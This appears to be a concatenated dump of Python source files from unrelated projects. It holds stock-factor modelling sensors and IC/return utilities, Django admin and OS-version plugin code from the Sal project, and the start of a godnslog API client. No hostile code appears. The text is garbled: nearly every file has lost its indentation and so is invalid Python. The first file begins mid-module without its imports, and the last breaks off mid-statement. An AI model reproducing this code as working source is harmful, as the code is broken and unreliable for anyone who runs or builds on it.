from scipy.stats import spearmanr
import numpy as np
class FakeForwardReturn(Sensor):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.lastvalue = None
@property
def output_variables(self):
return ["exposure", "factorName"]
def do(self, date, mp: MessagePackage, **kwargs):
scaler = kwargs.get("scaler", 0.5)
sigma = kwargs.get("sigma", 0.1)
shrinkage = kwargs.get("shrinkage", 0.2)
trueForwardReturn = mp.exposure
fakeForwardReturn = trueForwardReturn * scaler + np.random.normal(scale=sigma, size=4000)
if self.lastvalue is None:
thisvalue = fakeForwardReturn
else:
thisvalue = self.lastvalue * (1 - shrinkage) + fakeForwardReturn * shrinkage
self.lastvalue = thisvalue
self.logger.debug(spearmanr(trueForwardReturn, thisvalue, nan_policy="omit")[0])
return thisvalue, np.array(["fakeForwardReturn"])
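# Note (illustrative, not part of the original sensor): the update above is an
# exponential smoothing of the noisy signal,
#     value_t = (1 - shrinkage) * value_{t-1} + shrinkage * fake_t
# so with the default shrinkage of 0.2 roughly 80% of the previous fake forward
# return is carried over, keeping the faked signal serially correlated.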
```
#### File: benew_model/sensor/get_fundamental_pool_v2.py
```python
import numpy as np
from collider.data.data_manager import DataManager
from collider.data.message_package import MessagePackage
from collider.data.sensor import Sensor
class GetFundamentalPool(Sensor):
@property
def output_variables(self):
return ['pool']
def do(self, date: str, mp: MessagePackage, **kwargs) -> tuple:
as_of_date = mp.date
next_date = mp.data_manager.trading_dates.get_next_trading_date(as_of_date)
pool_name = kwargs["pool_name"]
quantile = kwargs.get("threshold", 0.5)
if quantile < 0 or quantile > 1:
raise ValueError("threshold should belong to [0, 1]")
pool_codes_dict = mp.data_manager.get_bar(
date=as_of_date,
columns=[pool_name, "pool_01"]
)
zscore = pool_codes_dict[pool_name]
pool_index = zscore >= np.nanpercentile(zscore, q=int(quantile * 100))
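        # Note (illustrative comment, not in the original): this keeps the stocks whose
        # pool score is at or above the (100 * threshold)-th percentile, i.e. roughly
        # the top (1 - threshold) fraction of the candidate universe.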
        # If a benchmark is given, add all of its constituents to the pool
if "benchmark_weight" in kwargs:
benchmark = kwargs["benchmark_weight"]
benchmark_weight = mp.data_manager.get_bar(date=as_of_date, columns=[benchmark])[benchmark]
pool_index |= benchmark_weight > 0
        # If there is a current holding, keep the held stocks in the pool
if hasattr(mp, "weight"):
pool_index |= mp.weight > 0
        # Drop ST stocks
st = mp.data_manager.get_bar(date=next_date, columns=["is_st"])["is_st"]
is_st = st == 1
pool_index &= (~is_st)
pool_index &= pool_codes_dict["pool_01"] == 1
return pool_index,
```
#### File: benew_model/sensor/get_pool_v2.py
```python
from collider.data.sensor import Sensor
from collider.data.message_package import MessagePackage
class GetPool(Sensor):
@property
def output_variables(self):
return ["pool"]
def do(self, date, mp: MessagePackage, **kwargs):
pool_name = kwargs["pool_name"]
as_of_date = mp.date
next_date = mp.data_manager.trading_dates.get_next_trading_date(as_of_date)
pool_codes_dict = mp.data_manager.get_bar(
date=as_of_date,
columns=[pool_name]
)
pool_index = pool_codes_dict[pool_name] == 1
        # If a benchmark is given, add all of its constituents to the pool
if "benchmark_weight" in kwargs:
benchmark = kwargs["benchmark_weight"]
benchmark_weight = mp.data_manager.get_bar(date=as_of_date, columns=[benchmark])[benchmark]
pool_index |= benchmark_weight > 0
        # If there is a current holding, keep the held stocks in the pool
if hasattr(mp, "weight"):
pool_index |= mp.weight > 0
        # Drop ST stocks; is_st is special in that it can be treated as available for the next trading day
st = mp.data_manager.get_bar(date=next_date, columns=["is_st"])["is_st"]
is_st = st == 1
pool_index &= (~is_st)
# FIXME:blacklist
# if self.blacklist:
# blacklist = self.data.setdefault("blacklist", None)
        #     # The blacklist must be read as of the trading date, while the pool uses the previous day's information
# black_dict = self.data_source.get_bar(
# date=self.data_source.trading_dates.get_next_trading_date(input), columns=blacklist)
#
# for b in blacklist:
# np.bitwise_and(pool_index, black_dict[b] != 1, out=pool_index)
return pool_index,
```
#### File: benew_model/sensor/predict_factor_return_ARIMA.py
```python
import numpy as np
from collider.data.sensor import Sensor
from pmdarima.arima import auto_arima
class PredictFactorReturn_ARIMA(Sensor):
"""
    Predict factor returns with an ARIMA model.
"""
@property
def output_variables(self):
return ["factorReturn", "factorName", "arima"]
def do(self, date, mp, **kwargs):
rolling_window = kwargs.setdefault("rolling_window", 1)
arima_dict = {}
if mp.factorReturn.shape[0] >= rolling_window:
prediction_return = np.zeros(shape=len(mp.factorName))
for i, fac in enumerate(mp.factorName):
                train = mp.factorReturn[-rolling_window:, i]
arima = auto_arima(train,
start_p=1, start_q=1, d=0,
max_p=5, max_d=2, max_q=5,
seasonal=False)
arima_dict[fac] = arima
prediction_return[i] = arima.predict(n_periods=kwargs.get("forward_period", 5))[-1]
else:
            # Return NaN when there is not enough history
self.logger.warning("factor return history is not enough?")
prediction_return = np.full(mp.factorName.size, np.nan)
return prediction_return, mp.factorName, arima_dict
```
#### File: benew_model/util/calculate_factor_feature.py
```python
import numpy as np
from scipy.stats import spearmanr
from collider.data.base_data_source import BaseDataSource
from common.configure import read_configure
from collider.utils.logger import system_log
system_log.level_name = "INFO"
bundle_path = read_configure(name="test")['bundle_path']
DataSource = BaseDataSource()
DataSource.initialize(bundle_path)
td = DataSource.trading_dates
def load_data_from_npy(trade_date, factor_name):
return DataSource.get_bar(trade_date, [factor_name])[factor_name]
def calculate_factor_feature(factors, forward_return_name, pool_name, dates, func, **kwargs) -> np.ndarray:
if isinstance(dates, list) or isinstance(dates, np.ndarray):
# rawIC = np.array([calculate_IC(factors, forward_return_name, pool_name, date) for date in dates])
rawIC = np.array(
[calculate_factor_feature(factors, forward_return_name, pool_name, date, func, **kwargs) for date in dates])
return rawIC
else:
pool = load_data_from_npy(dates, pool_name) == 1
forward_return = load_data_from_npy(dates, forward_return_name)
rawIC = np.array([func(load_data_from_npy(dates, f), forward_return, pool, **kwargs) for f in factors])
return rawIC
def calculate_IC(a, b, pool, **kwargs):
try:
direction = kwargs.get("direction", 1)
factor_topRt = kwargs.get("factor_topRt", 1.0)
total_cnt = np.sum(pool)
v = direction * a
v[~pool] = np.nan
topN = np.ceil(total_cnt * factor_topRt).astype(int)
v[np.argsort(-v)[topN:]] = np.nan
return spearmanr(v[pool], b[pool], nan_policy="omit")[0]
except Exception as e:
print(e)
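# Note (illustrative, not part of the original module): calculate_IC restricts the
# universe to the pool, keeps only the top `factor_topRt` fraction of names by the
# direction-adjusted factor value, and reports the Spearman rank correlation between
# those factor values and the forward return.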
import statsmodels.api as sm
def calculate_factor_return(a, b, pool, **kwargs):
direction = kwargs.get("direction", 1)
model = sm.OLS(b[pool], direction * a[pool], hasconst=False, missing="drop")
result = model.fit() # method = "qr"
return result.params[0]
def calculate_tvalue(a, b, pool, **kwargs):
direction = kwargs.get("direction", 1)
model = sm.OLS(b[pool], direction * a[pool], hasconst=False, missing="drop")
result = model.fit() # method = "qr"
return result.tvalues[0]
def calculate_autocorrelation(factor_name, date, pool, **kwargs):
today_data = load_data_from_npy(date, factor_name)
yesterday_data = load_data_from_npy(td.get_previous_trading_date(date), factor_name)
return calculate_IC(today_data, yesterday_data, pool, **kwargs)
def calculate_factor_autocorrelation(factors, dates, pool_name, **kwargs):
if isinstance(dates, list) or isinstance(dates, np.ndarray):
result = np.array([calculate_factor_autocorrelation(factors, date, pool_name, **kwargs) for date in dates])
return result
else:
pool = load_data_from_npy(dates, pool_name) == 1
rawIC = np.array([calculate_autocorrelation(f, dates, pool, **kwargs) for f in factors])
return rawIC
def calculate_hithot(a, b, pool, **kwargs):
# factor_topN = kwargs.get("factor_topN", 500)
# ret_topN = kwargs.get("ret_topN", 1000)
factor_topRt = kwargs.get("factor_topRt", 0.2)
ret_topRt = kwargs.get("ret_topRt", 0.3)
    # a is the factor value, b is the forward return
ret = np.where(pool, b, np.nan)
v = np.where(pool, a, np.nan)
total_cnt = np.sum(pool)
    # From the given ratios, work out how many stocks the factor top and the return top should cover
ret_topN = np.ceil(total_cnt * ret_topRt).astype(int)
factor_topN = np.ceil(total_cnt * factor_topRt).astype(int)
code_a = np.argsort(-ret)[:ret_topN]
code_b = np.argsort(-v)[:factor_topN]
intersec = set(code_a).intersection(set(code_b))
ratio = len(intersec) * 1.0 / len(code_b)
return ratio
def calculate_topret(a, b, pool, **kwargs):
factor_topRt = kwargs.get("factor_topRt", 0.2)
    # a is the factor value, b is the forward return
ret = np.where(pool, b, np.nan)
v = np.where(pool, a, np.nan)
total_cnt = np.sum(pool)
factor_topN = np.ceil(total_cnt * factor_topRt).astype(int)
weight = np.ones(factor_topN)
weight /= np.nansum(weight)
code_index = np.argsort(-v)[:factor_topN]
return np.nansum(ret[code_index] * weight)
if __name__ == "__main__":
start_date = "20100101"
end_date = "20190101"
factors = [
# 'benew_p5_ma10_hist_tvalue_p06_20180531_t7_0606221539248_after_f1',
# 'benew_p5_ma10_0322001055_after_f1',
# 'benew_p5_ma20_0326083326_after_f1',
# 'benew_p05_noma_tvalue_20150601_0816225040769_after_f1',
# 'benew_p06_noma_tvalue_20180901_tp_0935_1000_0922191517773_after_f1',
# 'benew_p06_noma_tvalue_20180901_tp_0935_1000_0922221054686_after_f1',
# 'benew_p02_noma_tvalue_20180901_tp_0935_1000_0920194834095_after_f1',
# 'benew_p5_ma10_hist_kaleido_p05_20180515_0530181708_after_f1',
# 'benew_p06_noma_tvalue_20180928_tp_0935_1000_1001183211111_after_f1',
# 'benew_p05_noma_tvalue_20180901_tp_0935_1000_0904104741953_after_f1',
# 'benew_p02_noma_tvalue_20180901_tp_0935_1000_0923223647237_after_f1',
# 'benew_p02_WTOP_R1011_20180928_tp_0935_1000_1017133635924_after_f1',
# 'benew_p1_noma_tvalue_20180702_0722152621667_after_f1',
#
"predicted_stock_return_f1",
"flow_estimation_fitted_f1",
"fake_2"
]
pool_name = "pool_01_final_f1"
forward_return_name = "forward_return_5_f1"
dates = td.get_trading_dates(start_date, end_date)
# IC = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC, direction=-1)
result = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC, factor_topRt=0.2)
import pandas as pd
# df = pd.DataFrame(IC, index=dates, columns=factors)
# print(df)
# result = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC)
# print(pd.DataFrame(result, index=dates, columns=factors))
# result = calculate_factor_autocorrelation(factors, dates, pool_name)
# # result = calculate_factor_feature(factors, forward_return_name, pool_name, dates, calculate_IC,
# direction=1)
df = pd.DataFrame(result, index=dates, columns=factors)
df.to_csv("model_top_ic.csv")
```
#### File: benew_model/util/calculate_some.py
```python
import pandas as pd
import numpy as np
from collider.utils.logger import user_log
import copy
import os
from collider.utils.decompose.mod import AttributeAnaMod
from common.configure import read_configure
bundle_path = read_configure(name="test")['bundle_path']
config = {
"data_bundle_path":bundle_path,
"benchmark":"000905.SH"
}
ds = AttributeAnaMod(config).DS
pool_name = "pool_01_final_f1"
forward_return_name = "forward_return_5_f1"
def load_fakedvalue(a):
return a * 0.1 + np.random.normal(scale=0.02, size=4000)
def cal_hotcatch(factor_topN=500, factors=[], ret_topN=1000, dates=None):
"""
    Compute the hit ratio of the factor top group against the forward-return top group, returned as a DataFrame.
:param factor_topN:
:param factors:
:param ret_topN:
:param dates:
:return:
"""
result = []
for date in dates:
pool = ~np.isnan(ds.get_bar(date=date,columns=[pool_name])[pool_name])
ret = np.array(ds.get_bar(date=date ,columns=[forward_return_name])[forward_return_name])
row = []
for fac in factors:
v = np.array(ds.get_bar(date=date,columns=[fac])[fac])
if fac == "forward_return_5_f1":
v = load_fakedvalue(v)
ret[~pool] = np.nan
v[~pool] = np.nan
code_a = ds.codes[np.argsort(-ret)[:ret_topN]]
code_b = ds.codes[np.argsort(-v)[:factor_topN]]
intersec = set(code_a).intersection(set(code_b))
ratio = len(intersec)*1.0/len(code_b)
row.append(ratio)
result.append(row)
cols = []
for i in factors:
if i == "forward_return_5_f1":
cols.append("faked_" + i )
else:
cols.append(i)
df = pd.DataFrame(result,columns=cols)
df["trade_date"] = dates
return df[["trade_date"] + cols]
def load_top_ret(factors=[], topN=500, weighted_type=1, dates=[]):
"""
    Compute the cumulative return of the top group.
    weighted_type = 1: equal weights
    weighted_type = 2: weights proportional to k / sum(1..N)
:param factors:
:param topN:
:param weighted_type:
:param dates:
:return:
"""
if weighted_type == 1:
weg = np.full(topN,1.0/topN)
if weighted_type == 2:
a = np.arange(1,topN+1,1)
weg = a/np.sum(a)
result = []
for date in dates:
data = ds.get_bar(date=date,columns=[pool_name,forward_return_name])
pool = ~np.isnan(data[pool_name])
ret = np.array(data[forward_return_name])
ret[~pool] = np.nan
row = []
for fac in factors:
fac_data = np.array(ds.get_bar(date=date,columns=[fac])[fac])
fac_data[~pool] = np.nan
code_index = np.argsort(-fac_data)[:topN]
v = np.nansum(ret[code_index] * weg[::-1])
row.append(v)
result.append(row)
cols = []
for i in factors:
if i == "forward_return_5_f1":
cols.append("faked_" + i)
else:
cols.append(i)
result = np.cumsum(np.array(result),axis=0)
df = pd.DataFrame(result ,columns=cols)
df["trade_date"] = dates
return df[["trade_date"] + cols]
if __name__ == "__main__":
startdate = "20170101"
end_date = "20181230"
dates = [i for i in sorted(list(ds.dates)) if i >= startdate and i <= end_date]
factor_topN = 500
factors = ["predicted_stock_return_f1","flow_estimation_fitted_f1","forward_return_5_f1"]
ret_topN = 500
#df = cal_hotcatch(factor_topN=500,factors=factors,ret_topN=ret_topN,dates=dates)
#df.to_csv("data/hotcatch_500.csv",index=False)
df = load_top_ret(factors=factors,dates=dates)
df.to_csv("data/group1_return.csv",index=False)
```
#### File: benew_model/util/strategy_feature.py
```python
import numpy as np
from util.decorator import cache, np_cache
from collider.utils.logger import system_log
@np_cache
def benew_rank(return_expectation):
# system_log.info("rank: %s" % np.nansum(return_expectation))
i = 0
rank_num = np.full(len(return_expectation), np.nan)
    v0, s0 = np.unique(return_expectation, return_index=True)  # not using rank/order directly so that ties in factor values are handled
for v, s in zip(v0, s0):
if np.isnan(v):
pass
else:
rank_num[return_expectation == v] = i
i += 1
rank_num /= i - 1
rank_num[rank_num == 1] -= 1e-8
return rank_num
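# Worked example (illustrative, not part of the original module):
#   benew_rank(np.array([0.3, 0.1, 0.2, np.nan]))
# dense-ranks the non-NaN values into [0, 1): 0.1 -> 0.0, 0.2 -> 0.5, 0.3 -> 1.0 - 1e-8
# (the top value is nudged just below 1), NaN stays NaN, giving approximately
# [1.0, 0.0, 0.5, nan].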
@cache()
def calculate_rank_mean(**kwargs):
return_rank = benew_rank(-kwargs['stock_return'])
holding_weight = kwargs['holding_weight']
return return_rank[holding_weight > 0].mean()
@cache()
def calculate_rank_weighted_mean(**kwargs):
return_rank = benew_rank(-kwargs['stock_return'])
holding_weight = kwargs['holding_weight']
return np.nansum(return_rank * holding_weight)
@cache()
def calculate_rank_cumsum(**kwargs):
return_rank = benew_rank(-kwargs['stock_return'])
holding_weight = kwargs['holding_weight']
return sum(holding_weight[holding_weight > 0][return_rank[holding_weight > 0] < kwargs["threshold"]])
@cache()
def calculate_exposure_weighted_mean(**kwargs):
exposure = kwargs.get("exposure")
holding_weight = kwargs.get("holding_weight")
hedge_weight = kwargs.get("hedge_weight")
return np.dot(np.nan_to_num(exposure), np.nan_to_num(holding_weight - hedge_weight))
# Compute x-to-y and y-to-x mappings by linear interpolation
def x_to_y(x, cum):
y0 = np.insert(cum, 0, 0)
x0 = np.arange(0, len(cum) + 1) / len(cum)
index = np.sum(x0 < x)
return (x - x0[index - 1]) / (x0[index] - x0[index - 1]) * (y0[index] - y0[index - 1]) + y0[index - 1]
def y_to_x(y, cum):
y0 = np.insert(cum, 0, 0)
x0 = np.arange(0, len(cum) + 1) / len(cum)
index = np.sum(y0 < y)
return (y - y0[index - 1]) / (y0[index] - y0[index - 1]) * (x0[index] - x0[index - 1]) + x0[index - 1]
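# Worked example (illustrative, not part of the original module): with
# cum = np.array([0.2, 0.5, 1.0]) the implied piecewise-linear curve passes through
# (0, 0), (1/3, 0.2), (2/3, 0.5), (1, 1.0); x_to_y(0.5, cum) interpolates between the
# second and third points and returns 0.35, and y_to_x is the inverse mapping, so
# y_to_x(0.35, cum) returns 0.5.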
@cache()
def calculate_exposure_CDF(**kwargs):
exposure = kwargs.pop("exposure")
    # If several factors are passed, recurse and compute them one factor at a time
if len(exposure.shape) > 1 and exposure.shape[0] > 1:
return [calculate_exposure_CDF(exposure=expo, **kwargs) for expo in exposure]
    # Compute the CDF metric below
holding_weight = kwargs.get("holding_weight")
hedge_weight = kwargs.get("hedge_weight")
long_side = holding_weight > 0
short_side = hedge_weight > 0
    # Sort, then take the cumulative sum
    # Precision has to be reduced here, otherwise spurious "1 < 1" comparisons appear
a = np.argsort(exposure[long_side])
cumWeightL = np.round(np.cumsum(holding_weight[long_side][a]), 8)
b = np.argsort(exposure[short_side])
cumWeightS = np.round(np.cumsum(hedge_weight[short_side][b]), 8)
    # HARD-CODE: split into 100 buckets
    # FIXME: why the abs()?
return 2 * sum(
[0.01 * abs(j - x_to_y(x=y_to_x(y=j, cum=cumWeightS), cum=cumWeightL)) for j in np.linspace(0, 1, 100)])
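# Note (illustrative, not part of the original module): the sum above approximates
# twice the area between the long-side and short-side cumulative exposure curves,
# sampled at 100 evenly spaced quantiles; 0 means the two weight distributions load
# on the factor identically, larger values mean a bigger mismatch.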
```
#### File: benew_model/util/strategy_monitor.py
```python
import pandas as pd
import os
from common.trade_date import generate_trade_date_sequence
from common.data_source_from_bundle import load_data_from_npy
from common.data_source_from_pkl import load_data_from_pkl
from common.strategy import read_holding
from util.strategy_feature import *
def holding_feature(trade_date, strategy_path: str, features=[], hedge_index="weight_index_500", **kwargs):
"""
    Compute features of the portfolio holdings.
:param trade_date:
:param strategy_path:
:param features:
:param hedge_index:
:param kwargs:
:return:
"""
trade_date_array = generate_trade_date_sequence(trade_date)
if len(trade_date_array) > 1:
result = pd.concat(
[holding_feature(date, strategy_path, features, hedge_index, **kwargs) for date in trade_date_array]
)
else:
factors = kwargs.get("factors", [])
trade_date_array = trade_date_array[0]
# step 1. read factors exposure
if len(factors) > 0:
kwargs["exposure"] = load_data_from_npy(trade_date_array, factors)
# step 1. read predicted_stock_return
if "stock_return_name" not in kwargs:
            # Read predicted_stock_return from pkl files; kwargs must include root and scenario
kwargs["stock_return"] = load_data_from_pkl(trade_date_array, "predicted_stock_return", **kwargs)
else:
            # Read predicted_stock_return from the data bundle
kwargs["stock_return"] = load_data_from_npy(trade_date_array, [kwargs.get("stock_return_name")])
# load pool if necessary
if "pool_name" in kwargs:
kwargs["pool"] = load_data_from_npy(trade_date_array, kwargs.get("pool_name"))
# step 2. read strategy holding
kwargs["holding_weight"] = read_holding(trade_date_array, strategy_path, offset=0, return_type="numpy")
if hedge_index is not None:
hedge_weight_raw = load_data_from_npy(trade_date_array, hedge_index)
kwargs["hedge_weight"] = np.nan_to_num(hedge_weight_raw) / np.nansum(hedge_weight_raw)
else:
kwargs["hedge_weight"] = None
        # step 4. compute the features
result = []
for fun, name, args in features:
items = name if isinstance(name, list) else [name]
result = result + [pd.DataFrame({
"trade_date": trade_date_array,
"strategy": os.path.basename(strategy_path),
"item": items,
"value": fun(trade_date=trade_date_array, item=items, **kwargs, **args)
})]
result = pd.concat(result)
return result
def calculate_attribution(**kwargs):
"""
    Performance attribution.
:param kwargs:
:return:
"""
pass
if __name__ == "__main__":
factors = ["style_beta_2", "style_size_2"]
_calculate_rank_features = [
(calculate_rank_mean, "rank_mean", {}),
(calculate_rank_weighted_mean, "rank_weighted_mean", {}),
(calculate_rank_cumsum, "rank_cumsum_10", {'threshold': 0.1}),
(calculate_rank_cumsum, "rank_cumsum_20", {'threshold': 0.2}),
(calculate_rank_cumsum, "rank_cumsum_30", {'threshold': 0.3}),
(calculate_rank_cumsum, "rank_cumsum_40", {'threshold': 0.4}),
(calculate_rank_cumsum, "rank_cumsum_50", {'threshold': 0.5})
]
_calculate_exposure_features = [
(calculate_exposure_weighted_mean, ["exposure_" + fac for fac in factors], {}),
(calculate_exposure_CDF, ["exposure_CDF_" + fac for fac in factors], {})
]
d = holding_feature(("20190102", "20190104"), "/Volumes/会牛/策略管理/benew/Simulation/swing6f",
features=_calculate_exposure_features + _calculate_rank_features,
stock_return_name="predicted_stock_return_f1",
factors=factors,
strategy="swing6f",
)
# d.to_csv("test.csv")
print(d)
# attribution = holding_feature(trade_date=("20190102", "20190104"),
# strategy_path="/Volumes/会牛/策略管理/benew/Simulation/swing6f",
# features=[(calculate_attribution,
# ["attr_" + _ for _ in factors],
# {})],
# stock_return="forward_return_1_close_f1",
# pool="pool_01_final_f1",
# factor=factors)
``` |
{
"source": "jokdbx/sal",
"score": 2
} |
#### File: sal/server/admin.py
```python
from django.contrib import admin
from django.forms import ModelForm, ModelMultipleChoiceField
from server.models import *
from server.utils import reload_plugins_model
class BusinessUnitFilter(admin.SimpleListFilter):
title = 'Business Unit'
parameter_name = 'business_unit'
def lookups(self, request, model_admin):
return ((bu.name, bu.name) for bu in BusinessUnit.objects.all())
def queryset(self, request, queryset):
if self.value():
return queryset.filter(machine__machine_group__business_unit__name=self.value())
else:
return queryset
class MachineGroupFilter(admin.SimpleListFilter):
title = 'Machine Group'
parameter_name = 'machine_group'
def lookups(self, request, model_admin):
return ((mg.name, mg.name) for mg in MachineGroup.objects.all())
def queryset(self, request, queryset):
if self.value():
return queryset.filter(machine__machine_group__name=self.value())
else:
return queryset
class MachineGroupInline(admin.TabularInline):
model = MachineGroup
class PluginScriptRowInline(admin.StackedInline):
model = PluginScriptRow
extra = 0
class UpdateHistoryItemInline(admin.TabularInline):
model = UpdateHistoryItem
extra = 0
class UserProfileInline(admin.StackedInline):
model = UserProfile
class BusinessUnitForm(ModelForm):
class Meta:
model = BusinessUnit
fields = ['name', 'users']
users = ModelMultipleChoiceField(
queryset=User.objects.exclude(userprofile__level='GA'),
label=('Members'),
required=False,
widget=admin.widgets.FilteredSelectMultiple(verbose_name="Users", is_stacked=False))
def number_of_users(obj):
return obj.users.count()
def number_of_machine_groups(obj):
return obj.machinegroup_set.count()
def number_of_machines(obj):
if isinstance(obj, MachineGroup):
return Machine.objects.filter(machine_group=obj).count()
else:
return Machine.objects.filter(machine_group__in=obj.machinegroup_set.all()).count()
def business_unit(obj):
return obj.machine_group.business_unit.name
class ApiKeyAdmin(admin.ModelAdmin):
list_display = ('name', 'public_key', 'private_key')
class BusinessUnitAdmin(admin.ModelAdmin):
inlines = [MachineGroupInline, ]
form = BusinessUnitForm
list_display = ('name', number_of_users, number_of_machine_groups, number_of_machines)
fields = (('name', number_of_users, number_of_machine_groups, number_of_machines), 'users')
readonly_fields = (number_of_users, number_of_machine_groups, number_of_machines)
class ConditionAdmin(admin.ModelAdmin):
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'condition_name')
list_display = ('condition_name', 'condition_data', 'machine')
search_fields = ('condition_name', 'condition_data', 'machine__hostname')
class FactAdmin(admin.ModelAdmin):
list_display = ('fact_name', 'fact_data', 'machine')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'fact_name')
search_fields = ('fact_name', 'fact_data', 'machine__hostname')
class HistoricalFactAdmin(admin.ModelAdmin):
list_display = ('fact_name', 'fact_data', 'machine', 'fact_recorded')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'fact_name')
search_fields = ('fact_name', 'fact_data', 'machine__hostname')
date_hierarchy = 'fact_recorded'
class InstalledUpdateAdmin(admin.ModelAdmin):
list_display = ('update', 'display_name', 'machine', 'update_version', 'installed')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'update')
search_fields = ('machine__hostname', 'display_name', 'update')
class MachineAdmin(admin.ModelAdmin):
list_display = ('hostname', 'serial', 'machine_model', 'operating_system', 'deployed')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'operating_system', 'os_family',
'machine_model', 'last_checkin', 'errors', 'warnings', 'puppet_errors',
'deployed')
fields = (
(business_unit, 'machine_group'),
('hostname', 'serial', 'console_user'),
('machine_model', 'machine_model_friendly'),
('cpu_type', 'cpu_speed'), ('memory', 'memory_kb'), ('hd_space', 'hd_total', 'hd_percent'),
('operating_system', 'os_family'),
('munki_version', 'manifest', 'errors', 'warnings'),
('last_checkin', 'first_checkin'),
('puppet_version', 'last_puppet_run', 'puppet_errors'),
('sal_version', 'deployed', 'broken_client'),
'report'
)
readonly_fields = (business_unit, 'first_checkin', 'last_checkin', 'last_puppet_run')
search_fields = ('hostname', 'console_user')
class MachineDetailPluginAdmin(admin.ModelAdmin):
list_display = ('name',)
def get_queryset(self, request):
"""Update db prior to retrieving plugins.
Views listing MachineDetailPlugins must first update the list of
installed plugins.
"""
reload_plugins_model()
return super(MachineDetailPluginAdmin, self).get_queryset(request)
class MachineGroupAdmin(admin.ModelAdmin):
list_display = ('name', 'business_unit', number_of_machines)
list_filter = (BusinessUnitFilter,)
fields = ('name', 'business_unit', number_of_machines, 'key')
readonly_fields = (number_of_machines, 'key')
class PendingUpdateAdmin(admin.ModelAdmin):
list_filter = (BusinessUnitFilter, MachineGroupFilter)
list_display = ('update', 'display_name', 'update_version', 'machine')
search_fields = ('update', 'display_name', 'machine__hostname')
class PluginAdmin(admin.ModelAdmin):
list_display = ('name',)
def get_queryset(self, request):
"""Update db prior to retrieving plugins.
Views listing Plugins must first update the list of
installed plugins.
"""
reload_plugins_model()
return super(PluginAdmin, self).get_queryset(request)
class PluginScriptRowAdmin(admin.ModelAdmin):
search_fields = ('pluginscript_name',)
class PluginScriptSubmissionAdmin(admin.ModelAdmin):
inlines = [PluginScriptRowInline, ]
list_display = ('plugin', 'machine', 'recorded', 'historical')
list_filter = (BusinessUnitFilter, MachineGroupFilter, 'plugin', 'historical', 'recorded')
search_fields = ('plugin', 'machine__hostname')
date_hierarchy = 'recorded'
class ReportAdmin(admin.ModelAdmin):
list_display = ('name',)
def get_queryset(self, request):
"""Update db prior to retrieving plugins.
Views listing MachineDetailPlugins must first update the list of
installed plugins.
"""
reload_plugins_model()
return super(ReportAdmin, self).get_queryset(request)
class SalSettingAdmin(admin.ModelAdmin):
list_display = ('name', 'value')
class FriendlyNameCacheAdmin(admin.ModelAdmin):
list_display = ('serial_stub', 'friendly_name')
class UpdateHistoryAdmin(admin.ModelAdmin):
inlines = [UpdateHistoryItemInline, ]
list_display = ('name', 'machine', 'update_type', 'version')
list_filter = ('update_type', BusinessUnitFilter, MachineGroupFilter)
search_fields = ('name', 'machine__hostname', 'version')
class UpdateHistoryItemAdmin(admin.ModelAdmin):
search_fields = ('update_history__name', 'update_history__machine__hostname')
list_display = ('update_history', 'recorded', 'status')
date_hierarchy = 'recorded'
class CustomUserAdmin(admin.ModelAdmin):
inlines = (UserProfileInline,)
list_display = ('username', 'profile_level', 'last_login')
list_filter = ('userprofile__level',)
search_fields = ('username', )
fields = (
('username', 'first_name', 'last_name', 'email'),
('is_staff', 'is_active', 'is_superuser'),
('last_login', 'date_joined'),
)
def profile_level(self, user):
return user.userprofile.level
admin.site.register(ApiKey, ApiKeyAdmin)
admin.site.register(BusinessUnit, BusinessUnitAdmin)
admin.site.register(Condition, ConditionAdmin)
admin.site.register(Fact, FactAdmin)
admin.site.register(HistoricalFact, HistoricalFactAdmin)
admin.site.register(InstalledUpdate, InstalledUpdateAdmin)
admin.site.register(Machine, MachineAdmin)
admin.site.register(MachineDetailPlugin, MachineDetailPluginAdmin)
admin.site.register(MachineGroup, MachineGroupAdmin)
admin.site.register(PendingAppleUpdate, PendingUpdateAdmin)
admin.site.register(PendingUpdate, PendingUpdateAdmin)
admin.site.register(Plugin, PluginAdmin)
admin.site.register(PluginScriptRow, PluginScriptRowAdmin)
admin.site.register(PluginScriptSubmission, PluginScriptSubmissionAdmin)
admin.site.register(Report, ReportAdmin)
admin.site.register(SalSetting, SalSettingAdmin)
admin.site.register(UpdateHistory, UpdateHistoryAdmin)
admin.site.register(UpdateHistoryItem, UpdateHistoryItemAdmin)
admin.site.unregister(User)
admin.site.register(User, CustomUserAdmin)
admin.site.register(FriendlyNameCache, FriendlyNameCacheAdmin)
```
#### File: plugins/operatingsystem/operatingsystem.py
```python
from collections import defaultdict, OrderedDict
from distutils.version import LooseVersion
from django.db.models import Count
import sal.plugin
# This table is also used for sequencing output, so use OrderedDict.
OS_TABLE = OrderedDict(Darwin='macOS', Windows='Windows', Linux='Linux', ChromeOS='Chrome OS')
class OperatingSystem(sal.plugin.Widget):
description = 'List of operating system versions'
template = 'operatingsystem/templates/operatingsystem.html'
def get_context(self, machines, **kwargs):
context = self.super_get_context(machines, **kwargs)
# Remove invalid versions, then annotate with a count.
os_info = (
machines
.exclude(operating_system__isnull=True)
.exclude(operating_system='')
.order_by('operating_system')
.values('operating_system', 'os_family')
.distinct()
.annotate(count=Count('operating_system')))
grouped = defaultdict(list)
for version in os_info:
os_type = OS_TABLE[version['os_family']]
grouped[os_type].append(version)
        # you and your lambda's @sheacraig...
os_key = lambda x: LooseVersion(x["operating_system"]) # noqa: E731
output = [
(key, sorted(grouped[key], key=os_key, reverse=True)) for key in OS_TABLE.values()]
context['os_info'] = output
return context
def filter(self, machines, data):
try:
os_family, operating_system = data.split('&')
except ValueError:
return None, None
machines = machines.filter(operating_system=operating_system, os_family=os_family)
return machines, 'Machines running {} {}'.format(OS_TABLE[os_family], operating_system)
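# Note (illustrative, not part of the original plugin): the widget's filter expects
# data formatted as "<os_family>&<operating_system>", e.g. "Darwin&10.15.7", which
# narrows machines to that version and yields the title
# "Machines running macOS 10.15.7".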
``` |
{
"source": "joke0jie/godnslog",
"score": 3
} |
#### File: examples/python/cli.py
```python
import requests
import hashlib
import time
import json
import getopt, sys
class Client(object):
def __init__(self, domain, secret, ssl):
self.domain = domain
self.secret = secret
self.host = 'http://' + domain
if ssl:
